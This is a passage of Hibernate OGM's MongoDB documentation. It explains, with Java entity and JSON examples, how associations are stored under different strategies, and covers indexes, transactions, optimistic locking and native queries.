@EmbeddedId\n private CourtId id;\n\n private String name;\n\n @OneToMany(mappedBy = \"playedOn\")\n private Set<Game> games = new HashSet<Game>();\n\n \/\/ getters, setters ...\n}\n\npublic class CourtId implements Serializable {\n\n private String countryCode;\n private int sequenceNo;\n\n \/\/ getters, setters ...\n \/\/ equals \/ hashCode\n}\n----\n\n.Court collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n },\n \"name\" : \"Hamburg Court\",\n \"games\" : [\n { \"gameSequenceNo\" : 457, \"category\" : \"primary\" },\n { \"gameSequenceNo\" : 456, \"category\" : \"primary\" }\n ]\n}\n----\n\n.Game collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"category\" : \"primary\",\n \"gameSequenceNo\" : 456\n },\n \"name\" : \"The game\",\n \"playedOn_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n }\n}\n{\n \"_id\" : {\n \"category\" : \"primary\",\n \"gameSequenceNo\" : 457\n },\n \"name\" : \"The other game\",\n \"playedOn_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n }\n}\n----\n====\n\nHere we see that the embedded id is represented as a nested document\nand directly referenced by the associations.\n\n[[mongodb-in-entity-to-many-associations]]\n===== To-many associations\n\n.Unidirectional one-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\",\n \"products\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n====\n\n.Unidirectional one-to-many with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\",\n \"products\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n====\n\nA map can be used to represent an association,\nin this case Hibernate OGM will store the key of the map\nand the associated id.\n\n.Unidirectional one-to-many using maps with defaults\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\nUser collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"user_001\",\n \"addresses\" : [\n {\n \"work\" : \"address_001\",\n \"home\" : \"address_002\"\n }\n ]\n}\n----\n\nAddress collection as JSON in MongoDB\n\n[source, JSON]\n----\n{ \"_id\" : \"address_001\", \"city\" : \"Rome\" }\n{ \"_id\" : \"address_002\", \"city\" : \"Paris\" }\n----\n====\n\nIf the map value cannot be represented by a single field (e.g. when referencing a type with a composite id\nor using an embeddable type as map value type),\na sub-document containing all the required fields will be stored as value.\n\nIf the map key either is not of type `String` or it is made up of several columns (composite map key),\nthe optimized structure shown in the example above cannot be used as MongoDB only allows for Strings as field names.\nIn that case the association will be represented by a list of sub-documents, also containing the map key column(s).\nYou can use `@MapKeyColumn` to rename the field containing the key of the map,\notherwise it will default to \"<%COLLECTION_ROLE%>_KEY\", e.g. \"addresses_KEY\".\n\n.Unidirectional one-to-many using maps with @MapKeyColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n @MapKeyColumn(name = \"addressType\")\n private Map<Long, Address> addresses = new HashMap<Long, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\nUser collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"user_001\",\n \"addresses\" : [\n {\n \"addressType\" : 1,\n \"addresses_id\" : \"address_001\"\n },\n {\n \"addressType\" : 2,\n \"addresses_id\" : \"address_002\"\n }\n ]\n}\n----\n\nAddress collection as JSON in MongoDB\n\n[source, JSON]\n----\n{ \"_id\" : \"address_001\", \"city\" : \"Rome\" }\n{ \"_id\" : \"address_002\", \"city\" : \"Paris\" }\n----\n====\n\nIn case you want to enforce the list-style represention also for maps with a single key column of type `String`\n(e.g. when reading back data persisted by earlier versions of Hibernate OGM),\nyou can do so by setting the option `hibernate.ogm.datastore.document.map_storage` to the value `AS_LIST`.\n\n.Unidirectional many-to-many using in entity strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" :\"John Doe\" }\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n \"students\" : [\n \"mario\",\n \"john\"\n ]\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n \"students\" : [\n \"mario\",\n \"kate\"\n ]\n}\n----\n====\n\n.Bidirectional many-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany( mappedBy = \"bankAccounts\" )\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n \"bankAccounts\" : [ \"account_1\" ]\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n \"owners\" : [ \"owner_1\", \"owner2222\" ]\n}\n----\n====\n\n.Ordered list with embedded id\n====\n[source, JAVA]\n----\n@Entity\npublic class Race {\n @EmbeddedId\n private RaceId raceId;\n\n @OrderColumn(name = \"ranking\")\n @OneToMany @JoinTable(name = \"Race_Runners\")\n private List<Runner> runnersByArrival = new ArrayList<Runner>();\n\n \/\/ getters, setters ...\n}\n\npublic class RaceId implements Serializable {\n private int federationSequence;\n private int federationDepartment;\n\n \/\/ getters, setters, equals, hashCode\n}\n\n@Entity\npublic class Runner {\n @EmbeddedId\n private RunnerId runnerId;\n private int age;\n\n \/\/ getters, setters ...\n}\n\npublic class RunnerId implements Serializable {\n private String firstname;\n private String lastname;\n\n \/\/ getters, setters, equals, hashCode\n}\n----\n\n.Race collection\n[source, JSON]\n----\n{\n \"_id\": {\n \"federationDepartment\": 75,\n \"federationSequence\": 23\n },\n \"runnersByArrival\": [{\n \"firstname\": \"Pere\",\n \"lastname\": \"Noel\",\n \"ranking\": 1\n }, {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\",\n \"ranking\": 0\n }]\n}\n----\n\n.Runner collection\n[source, JSON]\n----\n{\n \"_id\": {\n \"firstname\": \"Pere\",\n \"lastname\": \"Noel\"\n },\n \"age\": 105\n} {\n \"_id\": {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\"\n },\n \"age\": 37\n}\n----\n====\n\n[[mongodb-collection-per-association-strategy]]\n===== One collection per association strategy\n\nIn this strategy, Hibernate OGM creates a MongoDB collection per association\nin which it will store all navigation information for that particular association.\n\nThis is the strategy closest to the relational model.\nIf an entity A is related to B and C, 2 collections will be created.\nThe name of this collection is made of the association table concatenated with `associations_`.\n\nFor example, if the `BankAccount` and `Owner` are related,\nthe collection used to store will be named `associations_Owner_BankAccount`. You can rename\nThe prefix is useful to quickly identify the association collections from the entity collections.\nYou can also decide to rename the collection representing the association using `@JoinTable`\n(see <<mongodb-one-collection-strategy-join-table, an example>>)\n\nEach document of an association collection has the following structure:\n\n* `_id` contains the id of the owner of relationship\n* `rows` contains all the id of the related entities\n\n[NOTE]\n====\nThe preferred approach is to use the <<mongodb-in-entity-strategy, in-entity strategy>>\nbut this approach can alleviate the problem of having documents that are too big.\n====\n\n.Unidirectional relationship\n====\n[source, JSON]\n----\n{\n \"_id\" : { \"owners_id\" : \"owner0001\" },\n \"rows\" : [\n \"accountABC\",\n \"accountXYZ\"\n ]\n}\n----\n====\n\n.Bidirectional relationship\n====\n[source, JSON]\n----\n{\n \"_id\" : { \"owners_id\" : \"owner0001\" },\n \"rows\" : [ \"accountABC\", \"accountXYZ\" ]\n}\n{\n \"_id\" : { \"bankAccounts_id\" : \"accountXYZ\" },\n \"rows\" : [ \"owner0001\" ]\n}\n----\n====\n\n[NOTE]\n====\nThis strategy won't affect *-to-one associations or embedded collections.\n====\n\n.Unidirectional one-to-many using one collection per strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nassociations_Basket_Product collection\n[source, JSON]\n----\n{\n \"_id\" : { \"Basket_id\" : \"davide_basket\" },\n \"rows\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n====\n\nThe order of the element in the list might be preserved using @OrderColumn.\nHibernate OGM will store the order adding an additional fieldd to the document\ncontaining the association.\n\n.Unidirectional one-to-many using one collection per strategy with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n @OrderColumn\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nassociations_Basket_Product collection\n\n[source, JSON]\n----\n{\n \"_id\" : { \"Basket_id\" : \"davide_basket\" },\n \"rows\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n====\n\n.Unidirectional many-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n}\n----\n\nassociations_ClassRoom_Student\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(1),\n },\n \"rows\" : [ \"john\", \"mario\" ]\n}\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(2),\n },\n \"rows\" : [ \"mario\", \"kate\" ]\n}\n----\n====\n\n.Bidirectional many-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nassociations_AccountOwner_BankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\"\n },\n \"rows\" : [ \"owner_1\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner_1\"\n },\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[mongodb-one-collection-strategy-join-table]]\nYou can change the name of the collection containing the association using the `@JoinTable` annotation.\nIn the following example, the name of the collection containing the association is `OwnerBankAccounts`\n(instead of the default `associations_AccountOwner_BankAccount`)\n\n.Bidirectional many-to-many using one collection per association strategy and @JoinTable\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n @JoinTable( name = \"OwnerBankAccounts\" )\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nOwnerBankAccount\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\"\n },\n \"rows\" : [ \"owner_1\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner_1\"\n },\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[mongodb-association-document-strategy]]\n===== Global collection strategy\n\nWith this strategy, Hibernate OGM creates a single collection named `Associations`\nin which it will store all navigation information for all associations.\nEach document of this collection is structured in 2 parts.\nThe first is the `_id` field which contains the identifier information\nof the association owner and the name of the association table.\nThe second part is the `rows` field which stores (into an embedded collection) all ids\nthat the current instance is related to.\n\n[NOTE]\n====\nThis strategy won't affect *-to-one associations or embedded collections.\n\nGenerally, you should not make use of this strategy\nunless embedding the association information proves to be too big for your document\nand you wish to separate them.\n====\n\n.Associations collection containing unidirectional association\n====\n[source, JSON]\n----\n{\n \"_id\": {\n \"owners_id\": \"owner0001\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"accountABC\", \"accountXYZ\" ]\n}\n----\n====\n\nFor a bidirectional relationship, another document is created where ids are reversed.\nDon't worry, Hibernate OGM takes care of keeping them in sync:\n\n.Associations collection containing a bidirectional association\n====\n[source, JSON]\n----\n{\n \"_id\": {\n \"owners_id\": \"owner0001\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"accountABC\", \"accountXYZ\" ]\n}\n{\n \"_id\": {\n \"bankAccounts_id\": \"accountXYZ\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"owner0001\" ]\n}\n----\n====\n\n.Unidirectional one-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nAssociations collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"Basket_id\" : \"davide_basket\",\n \"table\" : \"Basket_Product\"\n },\n \"rows\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n====\n\n.Unidirectional one-to-many using global collection strategy with `@JoinTable`\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n \/\/ It will change the value stored in the field table in the Associations collection\n @JoinTable( name = \"BasketContent\" )\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"Basket_id\" : \"davide_basket\",\n \"table\" : \"BasketContent\"\n },\n \"rows\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n====\n\n.Unidirectional many-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(1),\n \"table\" : \"ClassRoom_Student\"\n },\n \"rows\" : [ \"john\", \"mario\" ]\n}\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(2),\n \"table\" : \"ClassRoom_Student\"\n },\n \"rows\" : [ \"mario\", \"kate\" ]\n}\n----\n====\n\n.Bidirectional many-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner0001\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\",\n \"table\" : \"AccountOwner_BankAccount\"\n },\n\n \"rows\" : [ \"owner0001\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner0001\",\n \"table\" : \"AccountOwner_BankAccount\"\n },\n\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[ogm-mongodb-indexes-unique-constraints]]\n=== Indexes and unique constraints\n\n==== Standard indexes and unique constraints\n\nYou can create your index and unique constraints in MongoDB using the standard JPA annotations.\n\n.Creating indexes and unique constraints using JPA annotations\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author, name\", name = \"author_name_idx\", unique = true),\n @Index(columnList = \"name DESC\", name = \"name_desc_idx\")\n})\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n @Column(unique = true)\n private String url;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n[NOTE]\n====\nMongoDB supports unique constraints via unique indexes. It considers `null` as a value to be unique: you can only\nhave one `null` value per unique index. This is not what is commonly accepted as the definition of a unique constraint in\nthe JPA world. Thus, by default, we create the unique indexes as `sparse`: it only indexes defined values so that the\nunique constraints accept multiple `null` values.\n====\n\n==== Using MongoDB specific index options\n\nMongoDB supports https:\/\/docs.mongodb.com\/manual\/reference\/method\/db.collection.createIndex\/[a number of options for\nindex creation].\n\nIt is possible to define them using the `@IndexOption` annotation.\n\n.Creating indexes with MongoDB specific options\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author\", name = \"author_idx\")\n})\n@IndexOptions(\n @IndexOption(forIndex = \"author_idx\", options = \"{ background : true, sparse : true, partialFilterExpression : { author: 'Verlaine' } }\")\n)\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n`@IndexOption` simply passes the options to MongoDB at index creation: you can use every option available in MongoDB.\n\n==== Full text indexes\n\nMongoDB supports the ability to create one (and only one) full text index per collection.\n\nAs JPA does not support the ability to define `text` as an order in the `@Index` annotation (only `ASC` and `DESC`\nare supported), this ability has been included inside the `@IndexOption` mechanism. You simply need to add `text: true`\nto the options passed to MongoDB, Hibernate OGM interprets it and translates the index to a full text index.\n\n.Creating a full text index\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author, name\", name = \"author_name_text_idx\")\n})\n@IndexOptions(\n @IndexOption(forIndex = \"author_name_text_idx\", options = \"{ text: true, default_language : 'fr', weights : { author: 2, name: 5 } }\")\n)\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n=== Transactions\n\nMongoDB does not support transactions.\nOnly changes applied to the same document are done atomically.\nA change applied to more than one document will not be applied atomically.\nThis problem is slightly mitigated by the fact that Hibernate OGM queues all changes\nbefore applying them during flush time.\nSo the window of time used to write to MongoDB is smaller than what you would have done manually.\n\nWe recommend that you still use transaction demarcations with Hibernate OGM\nto trigger the flush operation transparently (on commit).\nBut do not consider rollback as a possibility, this won't work.\n\n[[ogm-mongodb-optimisticlocking]]\n=== Optimistic Locking\n\nMongoDB does not provide a built-in mechanism for detecting concurrent updates to the same document\nbut it provides a way to execute atomic find and update operations.\nBy exploiting this commands Hibernate OGM can detect concurrent modifications to the same document.\n\nYou can enable optimistic locking detection using the annotation `@Version`:\n\n.Optimistic locking detection via `@Version`\n====\n[source, JAVA]\n----\n@Entity\npublic class Planet implements Nameable {\n\n @Id\n private String id;\n private String name;\n\n @Version\n private int version;\n\n \/\/ getters, setters ...\n}\n----\n\n----\n{\n \"_id\" : \"planet-1\",\n \"name\" : \"Pluto\",\n \"version\" : 0\n}\n----\n====\n\nThe `@Version` annotation define which attribute will keep track of the version of the document,\nHibernate OGM will update the field when required and if two changes from two different sessions (for example)\nare applied to the same document a `org.hibernate.StaleObjectStateException` is thrown.\n\nYou can use `@Column` to change the name of the field created on MongoDB:\n\n.Optimistic locking detection via `@Version` using `@Column`\n====\n[source, JAVA]\n----\n@Entity\npublic class Planet implements Nameable {\n\n @Id\n private String id;\n private String name;\n\n @Version\n @Column(name=\"OPTLOCK\")\n private int version;\n\n \/\/ getters, setters ...\n}\n----\n\n----\n{\n \"_id\" : \"planet-1\",\n \"name\" : \"Pluto\",\n \"OPTLOCK\" : 0\n}\n----\n====\n\n[[ogm-mongodb-queries]]\n=== Queries\n\nYou can express queries in a few different ways:\n\n* using JPQL\n* using a native MongoQL query\n* using a Hibernate Search query (brings advanced full-text and geospatial queries)\n\nWhile you can use JPQL for simple queries, you might hit limitations.\nThe current recommended approach is to use native MongoQL\nif your query involves nested (list of) elements.\n\nMongoDB doesn't require Hibernate Search to run queries.\n\n[NOTE]\n====\nIn order to reflect changes performed in the current session,\nall entities affected by a given query are flushed to the datastore prior to query execution\n(that's the case for Hibernate ORM as well as Hibernate OGM).\n\nFor not fully transactional stores such as MongoDB\nthis can cause changes to be written as a side-effect of running queries\nwhich cannot be reverted by a possible later rollback.\n\nDepending on your specific use cases and requirements you may prefer to disable auto-flushing,\ne.g. by invoking `query.setFlushMode( FlushMode.MANUAL )`.\nBear in mind though that query results will then not reflect changes applied within the current session.\n====\n\n==== JPQL queries\n\nHibernate OGM is a work in progress, so only a sub-set of JPQL constructs is available\nwhen using the JPQL query support. This includes:\n\n* simple comparisons using \"<\", \"+<=+\", \"=\", \">=\" and \">\"\n* `IS NULL` and `IS NOT NULL`\n* the boolean operators `AND`, `OR`, `NOT`\n* `LIKE`, `IN` and `BETWEEN`\n* `ORDER BY`\n* inner `JOIN` on embedded collections\n* projections of regular and embedded properties\n\nQueries using these constructs will be transformed into equivalent native MongoDB queries.\n\n[NOTE]\n====\nLet us know <<ogm-howtocontribute,by opening an issue or sending an email>>\nwhat query you wish to execute.\nExpanding our support in this area is high on our priority list.\n====\n\n[[ogm-mongodb-queries-native]]\n==== Native MongoDB queries\n\nHibernate OGM also supports certain forms of native queries for MongoDB.\nCurrently two forms of native queries are available via the MongoDB backend:\n\n* find queries specifying the search criteria only\n* queries specified using the MongoDB CLI syntax (<<ogm-mongodb-cli-syntax>>)\n\nThe former always maps results to entity types.\nThe latter either maps results to entity types or to certain supported forms of projection.\nNote that parameterized queries are not supported by MongoDB, so don't expect `Query#setParameter()` to work.\n\nYou can execute native queries as shown in the following example:\n\n.Using the JPA API\n====\n[source, JAVA]\n----\n@Entity\npublic class Poem {\n\n @Id\n private Long id;\n\n private String name;\n\n private String author;\n\n \/\/ getters, setters ...\n}\n\n...\n\njavax.persistence.EntityManager em = ...\n\n\/\/ criteria-only find syntax\nString query1 = \"{ $and: [ { name : 'Portia' }, { author : 'Oscar Wilde' } ] }\";\nPoem poem = (Poem) em.createNativeQuery( query1, Poem.class ).getSingleResult();\n\n\/\/ criteria-only find syntax with order-by\nString query2 = \"{ $query : { author : 'Oscar Wilde' }, $orderby : { name : 1 } }\";\nList<Poem> poems = em.createNativeQuery( query2, Poem.class ).getResultList();\n\n\/\/ projection via CLI-syntax\nString query3 = \"db.WILDE_POEM.find(\" +\n \"{ '$query' : { 'name' : 'Athanasia' }, '$orderby' : { 'name' : 1 } }\" +\n \"{ 'name' : 1 }\" +\n \")\";\n\n\/\/ will contain name and id as MongoDB always returns the id for projections\nList<Object[]> poemNames = (List<Object[]>)em.createNativeQuery( query3 ).getResultList();\n\n\/\/ projection via CLI-syntax\nString query4 = \"db.WILDE_POEM.count({ 'name' : 'Athanasia' })\";\n\nObject[] count = (Object[])em.createNativeQuery( query4 ).getSingleResult();\n----\n====\n\nThe result of a query is a managed entity (or a list thereof) or a projection of attributes in form of an object array,\njust like you would get from a JPQL query.\n\n.Using the Hibernate native API\n====\n[source, JAVA]\n----\nOgmSession session = ...\n\nString query1 = \"{ $and: [ { name : 'Portia' }, { author : 'Oscar Wilde' } ] }\";\nPoem poem = session.createNativeQuery( query1 )\n .addEntity( \"Poem\", Poem.class )\n .uniqueResult();\n\nString query2 = \"{ $query : { author : 'Oscar Wilde' }, $orderby : { name : 1 } }\";\nList<Poem> poems = session.createNativeQuery( query2 )\n .addEntity( \"Poem\", Poem.class )\n 